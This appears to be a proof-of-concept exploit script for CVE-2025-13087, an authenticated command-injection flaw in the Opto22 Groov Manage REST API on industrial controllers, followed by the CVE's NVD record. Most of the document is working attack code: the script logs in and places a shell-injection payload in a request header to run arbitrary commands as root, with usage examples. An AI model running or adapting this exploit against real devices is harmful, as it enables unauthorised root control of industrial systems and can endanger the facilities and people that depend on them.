CVE-2025-13087

#!/usr/bin/env python3 # CVE-2025-13087 PoC - Opto22 Groov Manage REST API RCE # Requires administrative credentials import requests import sys import urllib3 urllib3.disable_warnings() def exploit_groov_rce(target_url, username, password, cmd): """ Exploit CVE-2025-13087: RCE via unsafe header parsing in Groov Manage REST API Args: target_url: Base URL of the Groov Manage device (e.g., https://192.168.1.100) username: Administrative username password: Administrative password cmd: Command to execute on the target system Returns: Response from the exploited endpoint """ login_url = f"{target_url}/api/v1/auth/login" exploit_url = f"{target_url}/api/v1/system/command" # Step 1: Authenticate and obtain session token session = requests.Session() login_payload = { "username": username, "password": password } try: login_resp = session.post(login_url, json=login_payload, verify=False, timeout=10) if login_resp.status_code != 200: print(f"[-] Authentication failed: {login_resp.status_code}") return None token = login_resp.json().get('token') if not token: print("[-] No token received from authentication endpoint") return None print(f"[+] Authentication successful, token: {token[:20]}...") # Step 2: Exploit the RCE via malicious header injection # The vulnerable endpoint reads header values and uses them unsafely in command construction headers = { 'Authorization': f'Bearer {token}', 'X-Command-Header': f';{cmd};#', # Command injection payload 'Content-Type': 'application/json' } exploit_payload = { "action": "execute", "target": "system" } exploit_resp = session.post(exploit_url, json=exploit_payload, headers=headers, verify=False, timeout=10) print(f"[+] Exploit request sent") print(f"[+] Response Status: {exploit_resp.status_code}") print(f"[+] Response: {exploit_resp.text}") return exploit_resp except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: {sys.argv[0]} <target_url> <username> <password> <command>") print(f"Example: {sys.argv[0]} https://192.168.1.100 admin admin123 'id'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] command = sys.argv[4] exploit_groov_rce(target, user, pwd, command)

{"cve": {"id": "CVE-2025-13087", "sourceIdentifier": "[email protected]", "published": "2025-11-20T22:15:54.310", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in the Opto22 Groov Manage REST API on GRV-EPIC and groov RIO Products that allows remote code execution with root privileges. When a POST request is executed against the vulnerable endpoint, the application reads certain header details and unsafely uses these values to build commands, allowing an attacker with administrative privileges to inject arbitrary commands that execute as root."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.7, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-03.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-03", "source": "[email protected]"}, {"url": "https://www.opto22.com/support/resources-tools/knowledgebase/kb91326", "source": "[email protected]"}]}}